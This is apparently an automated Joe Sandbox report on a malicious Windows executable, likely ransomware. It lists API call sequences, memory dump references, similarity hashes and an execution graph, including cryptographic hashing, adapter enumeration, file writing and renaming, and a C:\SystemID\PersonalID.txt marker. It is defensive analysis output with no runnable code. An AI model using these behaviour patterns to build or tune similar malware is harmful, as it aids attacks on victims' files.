                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0049C6AD
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 0049C6DB
                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0049C0ED,?,00BFBBEF,00000003), ref: 0049C709
                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0049C0ED,?,00BFBBEF,00000003), ref: 0049C73F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 005270AB
                                                                                                                              • Part of subcall function 005277A0: ___BuildCatchObjectHelper.LIBCMT ref: 005277D2
                                                                                                                              • Part of subcall function 005277A0: ___AdjustPointer.LIBCMT ref: 005277E9
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 005270C2
                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 005270D4
                                                                                                                            • CallCatchBlock.LIBCMT ref: 005270F8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2901542994-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00485007: __getptd_noexit.LIBCMT ref: 00485008
                                                                                                                              • Part of subcall function 00485007: __amsg_exit.LIBCMT ref: 00485015
                                                                                                                            • __calloc_crt.LIBCMT ref: 00485A01
                                                                                                                              • Part of subcall function 00488C96: __calloc_impl.LIBCMT ref: 00488CA5
                                                                                                                            • __lock.LIBCMT ref: 00485A37
                                                                                                                            • ___addlocaleref.LIBCMT ref: 00485A43
                                                                                                                            • __lock.LIBCMT ref: 00485A57
                                                                                                                              • Part of subcall function 00485208: __getptd_noexit.LIBCMT ref: 00485208
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2580527540-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32 ref: 004727B9
                                                                                                                            • _malloc.LIBCMT ref: 004727C3
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A30000,00000000,00000001,00000001,?,?,?,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480CA5
                                                                                                                            • _memset.LIBCMT ref: 004727CE
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004727E4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2824100046-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32 ref: 00472806
                                                                                                                            • _malloc.LIBCMT ref: 00472814
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A30000,00000000,00000001,00000001,?,?,?,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480CA5
                                                                                                                            • _memset.LIBCMT ref: 0047281F
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00472832
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2824100046-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: .\crypto\asn1\tasn_new.c
                                                                                                                            • API String ID: 2102423945-2878120539
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0048AB93
                                                                                                                            • ___raise_securityfailure.LIBCMT ref: 0048AC7A
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                            • String ID: 8W
                                                                                                                            • API String ID: 3761405300-2509821728
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00473CA0
                                                                                                                              • Part of subcall function 00483B4C: _malloc.LIBCMT ref: 00483B64
                                                                                                                            • _memset.LIBCMT ref: 00473C83
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 1327501947-3788999226
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _fputws$CreateDirectory
                                                                                                                            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                            • API String ID: 2590308727-54166481
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • Assertion failed: %s, file %s, line %d, xrefs: 00480E13
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __calloc_crt
                                                                                                                            • String ID: Assertion failed: %s, file %s, line %d
                                                                                                                            • API String ID: 3494438863-969893948
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004E0686
                                                                                                                              • Part of subcall function 004B4C00: _raise.LIBCMT ref: 004B4C18
                                                                                                                            Strings
                                                                                                                            • .\crypto\evp\digest.c, xrefs: 004E0638
                                                                                                                            • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 004E062E
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset_raise
                                                                                                                            • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                            • API String ID: 1484197835-3867593797
                                                                                                                            • Opcode ID: 7e1c663466d9bdaf2276e8cd8f13db5fa4a11c6109014f03b63f8c04876246d7
                                                                                                                            • Instruction ID: 06d27f4caf493e386d9ba8b0ad95f11089463cba8687677dd14eb3348537f226
                                                                                                                            • Opcode Fuzzy Hash: 7e1c663466d9bdaf2276e8cd8f13db5fa4a11c6109014f03b63f8c04876246d7
                                                                                                                            • Instruction Fuzzy Hash: 06018B35700200AFC310DF19EC42E5AB7E1AFC8705F19442EF588CB362D761EC958B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF251
                                                                                                                              • Part of subcall function 00490CFC: std::exception::_Copy_str.LIBCMT ref: 00490D15
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF266
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,004AF299,?,?,?,?,?,?,?,004AF299,?,00568238,?), ref: 00490F1F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                            • String ID: TeS
                                                                                                                            • API String ID: 757275642-2115813586
                                                                                                                            • Opcode ID: e8f3159a6c9c80a27908fc3e2efeb66e616a28123fe40b021a09b476d08b9c57
                                                                                                                            • Instruction ID: 9b93e80207c89234d115c3431e76c89cfb3ebec580d4235197ab496171ba5b75
                                                                                                                            • Opcode Fuzzy Hash: e8f3159a6c9c80a27908fc3e2efeb66e616a28123fe40b021a09b476d08b9c57
                                                                                                                            • Instruction Fuzzy Hash: 6FD06774D4020DBBCF04EFA5C589CCDBFB8AA04349F40856AAE1597241EA74A3498B95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:6.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:1990
                                                                                                                            Total number of Limit Nodes:171
39622->39624 39625 e430b0 59 API calls 39624->39625 39629 e41631 39625->39629 39631 e41364 39627->39631 39628 e41480 lstrlenA 39632 e5d8d0 ___init_ctype 39628->39632 39633 e42840 60 API calls 39629->39633 39631->39603 39638 e41379 VirtualFree CloseHandle 39631->39638 39635 e414a5 lstrlenA 39632->39635 39636 e4163c WriteFile 39633->39636 39639 e3eaa0 91 API calls 39635->39639 39644 e41658 39636->39644 39642 e41396 39638->39642 39643 e414e0 39639->39643 39642->39085 39646 e3c5c0 62 API calls 39643->39646 39644->39615 39645 e41660 lstrlenA WriteFile 39644->39645 39645->39615 39647 e41686 CloseHandle 39645->39647 39657 e414f6 39646->39657 39648 e43100 59 API calls 39647->39648 39649 e416a3 39648->39649 39650 e459d0 59 API calls 39649->39650 39652 e416be MoveFileW 39650->39652 39654 e416e4 VirtualFree 39652->39654 39658 e418a7 39652->39658 39659 e416fc 39654->39659 39660 e43ff0 59 API calls 39657->39660 39662 e418d5 VirtualFree 39658->39662 39663 e418e3 39658->39663 39659->39085 39661 e41560 39660->39661 39664 e42f70 59 API calls 39661->39664 39662->39663 39663->39612 39665 e418e8 CloseHandle 39663->39665 39667 e4156f 39664->39667 39665->39612 39666 e417cb 39669 e42c40 59 API calls 39666->39669 39668 e3c070 98 API calls 39667->39668 39670 e41591 SetFilePointer 39668->39670 39671 e417ff 39669->39671 39670->39666 39670->39676 39672 e42bf0 59 API calls 39671->39672 39673 e41814 39672->39673 40482 e3cba0 39673->40482 39675 e41820 39677 e4186e VirtualFree CloseHandle 39675->39677 39678 e41834 WriteFile 39675->39678 39676->39616 39679 e4188b 39677->39679 39678->39676 39678->39677 39679->39085 39680->39088 39682 e4bab9 39681->39682 39683 e4babb ShowWindow UpdateWindow 39681->39683 39682->39090 39683->39090 39687 e40a81 39684->39687 39685 e456d0 59 API calls 39685->39687 39686 e40bb4 39686->39094 39687->39685 39687->39686 39688 e43ea0 59 API calls 39687->39688 39691 e43ff0 59 API calls 39687->39691 39692 e42900 60 API calls 39687->39692 39693 e43580 59 API calls 39687->39693 
39689 e40ae0 SetErrorMode PathFileExistsA SetErrorMode 39688->39689 39689->39687 39690 e40b0c GetDriveTypeA 39689->39690 39690->39687 39691->39687 39692->39687 39693->39687 39695 e4d3c0 59 API calls 39694->39695 39696 e4c347 39695->39696 39697 e4c35b 39696->39697 40625 e7f23e 59 API calls 2 library calls 39696->40625 39697->39120 39701 e4d340 59 API calls 39700->39701 39702 e4c257 39701->39702 39703 e4c26b 39702->39703 40626 e7f23e 59 API calls 2 library calls 39702->40626 39703->39120 39707 e4b8d6 39706->39707 39710 e4b8e0 39706->39710 39708 e44690 59 API calls 39707->39708 39708->39710 39709 e4b916 39712 e4b930 39709->39712 39713 e44690 59 API calls 39709->39713 39710->39709 39711 e44690 59 API calls 39710->39711 39711->39709 39714 e4b94a 39712->39714 39715 e44690 59 API calls 39712->39715 39713->39712 39716 e4b964 39714->39716 39718 e44690 59 API calls 39714->39718 39715->39714 40627 e4bfd0 39716->40627 39718->39716 39719 e4b976 39720 e4bfd0 59 API calls 39719->39720 39721 e4b988 39720->39721 39722 e4bfd0 59 API calls 39721->39722 39723 e4b99a 39722->39723 39724 e4b9b4 39723->39724 39725 e44690 59 API calls 39723->39725 39726 e4b9f2 39724->39726 39727 e43ff0 59 API calls 39724->39727 39725->39724 39726->39120 39727->39726 39729 e4326f 39728->39729 39731 e4327d 39728->39731 39730 e45c10 59 API calls 39729->39730 39732 e43278 39730->39732 39731->39731 39733 e45c10 59 API calls 39731->39733 39732->39120 39734 e4329c 39733->39734 39734->39120 39735->39120 40643 e4f130 timeGetTime 39735->40643 39736->39100 40819 e4fd80 39736->40819 39737->38872 39739 e41af4 39738->39739 39740 e41ad0 39738->39740 39739->38916 39741 e41afc 39740->39741 39742 e41adc DispatchMessageW PeekMessageW 39740->39742 39741->38916 39742->39739 39742->39740 39744 e4478c 39743->39744 39745 e446a9 39743->39745 40834 e7f26c 59 API calls 3 library calls 39744->40834 39747 e446b6 39745->39747 39748 e446e9 39745->39748 39749 e44796 39747->39749 39750 e446c2 39747->39750 39751 e446f5 39748->39751 39752 
e447a0 39748->39752 40835 e7f26c 59 API calls 3 library calls 39749->40835 40832 e43340 59 API calls _memmove 39750->40832 39762 e44707 ___init_ctype 39751->39762 40833 e46950 59 API calls 2 library calls 39751->40833 40836 e7f23e 59 API calls 2 library calls 39752->40836 39761 e446e0 39761->38919 39762->38919 39766->38937 39767->38918 39768->39061 39769->39093 39773 e45735 39772->39773 39778 e456de 39772->39778 39774 e457bc 39773->39774 39775 e4573e 39773->39775 39794 e7f23e 59 API calls 2 library calls 39774->39794 39782 e45750 ___init_ctype 39775->39782 39793 e46760 59 API calls 2 library calls 39775->39793 39778->39773 39784 e45704 39778->39784 39782->39318 39785 e4571f 39784->39785 39786 e45709 39784->39786 39788 e43ff0 59 API calls 39785->39788 39787 e43ff0 59 API calls 39786->39787 39789 e45719 39787->39789 39790 e4572f 39788->39790 39789->39318 39790->39318 39791->39322 39792->39324 39793->39782 39801 e53b4c 39795->39801 39797 e4ccca 39798 e4a00a 39797->39798 39811 e7f1bb 59 API calls 3 library calls 39797->39811 39798->38875 39798->38876 39805 e53b54 39801->39805 39802 e50c62 _malloc 58 API calls 39802->39805 39803 e53b6e 39803->39797 39805->39802 39805->39803 39806 e53b72 std::exception::exception 39805->39806 39812 e5793d DecodePointer 39805->39812 39813 e60eca RaiseException 39806->39813 39808 e53b9c 39814 e60d91 58 API calls _free 39808->39814 39810 e53bae 39810->39797 39812->39805 39813->39808 39814->39810 39816 e53b4c 59 API calls 39815->39816 39817 e4cc5d 39816->39817 39819 e4cc64 39817->39819 39822 e7f1bb 59 API calls 3 library calls 39817->39822 39819->39331 39821 e4d740 59 API calls 39819->39821 39821->39331 39825->39348 39826->39348 39830 e61570 39827->39830 39831 e61580 39830->39831 39832 e61586 39831->39832 39837 e615ae 39831->39837 39833 e55208 __flsbuf 58 API calls 39832->39833 39834 e6158b 39833->39834 39841 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 39834->39841 39838 e615cf wcstoxl 39837->39838 39842 e5e883 GetStringTypeW 
39837->39842 39839 e55208 __flsbuf 58 API calls 39838->39839 39840 e4a36e lstrcpyW lstrcpyW 39838->39840 39839->39840 39840->38909 39841->39840 39842->39837 39844 e41cf2 RegOpenKeyExW 39843->39844 39844->39355 39844->39356 39846 e44690 59 API calls 39845->39846 39847 e43550 39846->39847 39847->39370 39849 e502b6 39848->39849 39850 e50241 39848->39850 39859 e502c8 60 API calls 4 library calls 39849->39859 39852 e55208 __flsbuf 58 API calls 39850->39852 39857 e50266 39850->39857 39854 e5024d 39852->39854 39853 e502c3 39853->39402 39858 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 39854->39858 39856 e50258 39856->39402 39857->39402 39858->39856 39859->39853 39860->39429 39861->39428 39862->39419 39866 e50c62 _malloc 58 API calls 39865->39866 39867 e3e684 39866->39867 39868 e50c62 _malloc 58 API calls 39867->39868 39869 e3e690 39868->39869 39870 e3e6b4 GetAdaptersInfo 39869->39870 39871 e3e699 39869->39871 39873 e3e6c4 39870->39873 39874 e3e6db GetAdaptersInfo 39870->39874 39872 e51f2d _wprintf 85 API calls 39871->39872 39875 e3e6a3 39872->39875 39876 e50bed _free 58 API calls 39873->39876 39877 e3e6ea 39874->39877 39890 e3e741 39874->39890 39879 e50bed _free 58 API calls 39875->39879 39881 e3e6ca 39876->39881 39915 e504a6 39877->39915 39883 e3e6a9 39879->39883 39880 e50bed _free 58 API calls 39884 e3e74a 39880->39884 39885 e50c62 _malloc 58 API calls 39881->39885 39883->39432 39884->39432 39887 e3e6d2 39885->39887 39887->39871 39887->39874 39888 e3e737 39889 e51f2d _wprintf 85 API calls 39888->39889 39889->39890 39890->39880 39892 e456d0 59 API calls 39891->39892 39893 e3e8bb CryptAcquireContextW 39892->39893 39894 e3e8e9 CryptCreateHash 39893->39894 39895 e3e8d8 39893->39895 39897 e3e903 39894->39897 39898 e3e914 CryptHashData 39894->39898 40146 e60eca RaiseException 39895->40146 40147 e60eca RaiseException 39897->40147 39900 e3e943 CryptGetHashParam 39898->39900 39901 e3e932 39898->39901 39903 e3e963 39900->39903 39905 e3e974 _memset 39900->39905 40148 
e60eca RaiseException 39901->40148 40149 e60eca RaiseException 39903->40149 39906 e3e993 CryptGetHashParam 39905->39906 39907 e3e9a8 39906->39907 39914 e3e9b9 39906->39914 40150 e60eca RaiseException 39907->40150 39909 e3ea10 39911 e3ea16 CryptDestroyHash CryptReleaseContext 39909->39911 39910 e504a6 _sprintf 83 API calls 39910->39914 39912 e3ea33 39911->39912 39912->39438 39913 e43ea0 59 API calls 39913->39914 39914->39909 39914->39910 39914->39913 39916 e504d7 39915->39916 39917 e504c2 39915->39917 39916->39917 39919 e504de 39916->39919 39918 e55208 __flsbuf 58 API calls 39917->39918 39920 e504c7 39918->39920 39944 e56ab6 39919->39944 39943 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 39920->39943 39923 e3e725 39926 e51f2d 39923->39926 39924 e50504 39924->39923 39968 e564ef 78 API calls 4 library calls 39924->39968 39927 e51f39 _wprintf 39926->39927 39928 e51f5f __flsbuf 39927->39928 39929 e51f4a 39927->39929 39995 e50e92 39928->39995 39930 e55208 __flsbuf 58 API calls 39929->39930 39931 e51f4f 39930->39931 40011 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 39931->40011 39934 e51f6f __flsbuf 40000 e5afd2 39934->40000 39936 e51f5a _wprintf 39936->39888 39937 e51f82 __flsbuf 39938 e56ab6 __output_l 83 API calls 39937->39938 39939 e51f9b __flsbuf 39938->39939 40007 e5afa1 39939->40007 39943->39923 39969 e5019c 39944->39969 39947 e55208 __flsbuf 58 API calls 39948 e56b30 39947->39948 39949 e57601 39948->39949 39958 e56b50 __output_l __aulldvrm _strlen 39948->39958 39977 e5816b 39948->39977 39950 e55208 __flsbuf 58 API calls 39949->39950 39952 e57606 39950->39952 39985 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 39952->39985 39953 e575db 39955 e5a77e __cftog_l 6 API calls 39953->39955 39956 e575fd 39955->39956 39956->39924 39958->39949 39958->39953 39959 e5766a 78 API calls __output_l 39958->39959 39960 e571b9 DecodePointer 39958->39960 39961 e50bed _free 58 API calls 39958->39961 39962 e6adf7 60 API calls __cftof 39958->39962 39963 
e58cde __malloc_crt 58 API calls 39958->39963 39964 e5721c DecodePointer 39958->39964 39965 e576de 78 API calls _write_string 39958->39965 39966 e57241 DecodePointer 39958->39966 39967 e576b2 78 API calls _write_multi_char 39958->39967 39984 e52bcc 58 API calls _LocaleUpdate::_LocaleUpdate 39958->39984 39959->39958 39960->39958 39961->39958 39962->39958 39963->39958 39964->39958 39965->39958 39966->39958 39967->39958 39968->39923 39970 e501ad 39969->39970 39976 e501fa 39969->39976 39986 e55007 39970->39986 39972 e501b3 39973 e501da 39972->39973 39991 e545dc 58 API calls 6 library calls 39972->39991 39973->39976 39992 e5495e 58 API calls 6 library calls 39973->39992 39976->39947 39978 e58175 39977->39978 39979 e5818a 39977->39979 39980 e55208 __flsbuf 58 API calls 39978->39980 39979->39958 39981 e5817a 39980->39981 39994 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 39981->39994 39983 e58185 39983->39958 39984->39958 39985->39953 39987 e5501f __getptd_noexit 58 API calls 39986->39987 39988 e5500d 39987->39988 39989 e5501a 39988->39989 39993 e57c2e 58 API calls 3 library calls 39988->39993 39989->39972 39991->39973 39992->39976 39994->39983 39996 e50eb3 EnterCriticalSection 39995->39996 39997 e50e9d 39995->39997 39996->39934 39998 e58af7 __lock 58 API calls 39997->39998 39999 e50ea6 39998->39999 39999->39934 40001 e5816b __flsbuf 58 API calls 40000->40001 40002 e5afdf 40001->40002 40013 e689c2 40002->40013 40004 e5b034 40004->39937 40005 e5afe5 __flsbuf 40005->40004 40006 e58cde __malloc_crt 58 API calls 40005->40006 40006->40004 40008 e51faf 40007->40008 40009 e5afaa 40007->40009 40012 e51fc9 LeaveCriticalSection LeaveCriticalSection __flsbuf __getstream 40008->40012 40009->40008 40023 e5836b 40009->40023 40011->39936 40012->39936 40014 e689cd 40013->40014 40016 e689da 40013->40016 40015 e55208 __flsbuf 58 API calls 40014->40015 40017 e689d2 40015->40017 40018 e689e6 40016->40018 40019 e55208 __flsbuf 58 API calls 40016->40019 40017->40005 40018->40005 
40020 e68a07 40019->40020 40022 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40020->40022 40022->40017 40024 e5837e 40023->40024 40025 e583a2 40023->40025 40024->40025 40026 e5816b __flsbuf 58 API calls 40024->40026 40025->40008 40027 e5839b 40026->40027 40029 e5df14 40027->40029 40030 e5df20 _wprintf 40029->40030 40031 e5df2d 40030->40031 40033 e5df44 40030->40033 40129 e551d4 58 API calls __getptd_noexit 40031->40129 40032 e5dfe3 40133 e551d4 58 API calls __getptd_noexit 40032->40133 40033->40032 40036 e5df58 40033->40036 40035 e5df32 40038 e55208 __flsbuf 58 API calls 40035->40038 40039 e5df76 40036->40039 40040 e5df80 40036->40040 40050 e5df39 _wprintf 40038->40050 40130 e551d4 58 API calls __getptd_noexit 40039->40130 40057 e6b134 40040->40057 40041 e5df7b 40045 e55208 __flsbuf 58 API calls 40041->40045 40044 e5df86 40046 e5dfac 40044->40046 40047 e5df99 40044->40047 40048 e5dfef 40045->40048 40049 e55208 __flsbuf 58 API calls 40046->40049 40066 e5e003 40047->40066 40134 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40048->40134 40053 e5dfb1 40049->40053 40050->40025 40131 e551d4 58 API calls __getptd_noexit 40053->40131 40054 e5dfa5 40132 e5dfdb LeaveCriticalSection __unlock_fhandle 40054->40132 40058 e6b140 _wprintf 40057->40058 40059 e6b18f EnterCriticalSection 40058->40059 40060 e58af7 __lock 58 API calls 40058->40060 40061 e6b1b5 _wprintf 40059->40061 40062 e6b165 40060->40062 40061->40044 40063 e6b17d 40062->40063 40135 e6263e InitializeCriticalSectionAndSpinCount 40062->40135 40136 e6b1b9 LeaveCriticalSection _doexit 40063->40136 40067 e5e010 __write_nolock 40066->40067 40068 e5e04f 40067->40068 40069 e5e06e 40067->40069 40099 e5e044 40067->40099 40137 e551d4 58 API calls __getptd_noexit 40068->40137 40073 e5e0c6 40069->40073 40074 e5e0aa 40069->40074 40070 e5a77e __cftog_l 6 API calls 40075 e5e864 40070->40075 40072 e5e054 40076 e55208 __flsbuf 58 API calls 40072->40076 40077 e5e0df 40073->40077 40141 e5f744 60 API calls 3 library 
calls 40073->40141 40139 e551d4 58 API calls __getptd_noexit 40074->40139 40075->40054 40079 e5e05b 40076->40079 40081 e689c2 __flsbuf 58 API calls 40077->40081 40138 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40079->40138 40084 e5e0ed 40081->40084 40082 e5e0af 40085 e55208 __flsbuf 58 API calls 40082->40085 40086 e5e446 40084->40086 40091 e55007 _GetLcidFromLangCountry 58 API calls 40084->40091 40087 e5e0b6 40085->40087 40088 e5e464 40086->40088 40089 e5e7d9 WriteFile 40086->40089 40140 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40087->40140 40092 e5e588 40088->40092 40102 e5e47a 40088->40102 40093 e5e678 40089->40093 40094 e5e439 GetLastError 40089->40094 40096 e5e119 GetConsoleMode 40091->40096 40104 e5e593 40092->40104 40107 e5e67d 40092->40107 40095 e5e406 40093->40095 40094->40095 40097 e5e812 40095->40097 40095->40099 40106 e5e566 40095->40106 40096->40086 40098 e5e158 40096->40098 40097->40099 40100 e55208 __flsbuf 58 API calls 40097->40100 40098->40086 40101 e5e168 GetConsoleCP 40098->40101 40099->40070 40105 e5e840 40100->40105 40101->40097 40122 e5e197 40101->40122 40102->40095 40102->40097 40103 e5e4e9 WriteFile 40102->40103 40103->40094 40103->40102 40104->40097 40108 e5e5f8 WriteFile 40104->40108 40145 e551d4 58 API calls __getptd_noexit 40105->40145 40110 e5e571 40106->40110 40111 e5e809 40106->40111 40107->40097 40112 e5e6f2 WideCharToMultiByte 40107->40112 40108->40094 40113 e5e647 40108->40113 40114 e55208 __flsbuf 58 API calls 40110->40114 40144 e551e7 58 API calls 3 library calls 40111->40144 40112->40094 40121 e5e739 40112->40121 40113->40093 40113->40095 40113->40104 40117 e5e576 40114->40117 40116 e5e741 WriteFile 40119 e5e794 GetLastError 40116->40119 40116->40121 40143 e551d4 58 API calls __getptd_noexit 40117->40143 40119->40121 40121->40093 40121->40095 40121->40107 40121->40116 40122->40095 40123 e6c76c 60 API calls __putch_nolock 40122->40123 40124 e5e280 WideCharToMultiByte 40122->40124 40127 e5e2ed 40122->40127 
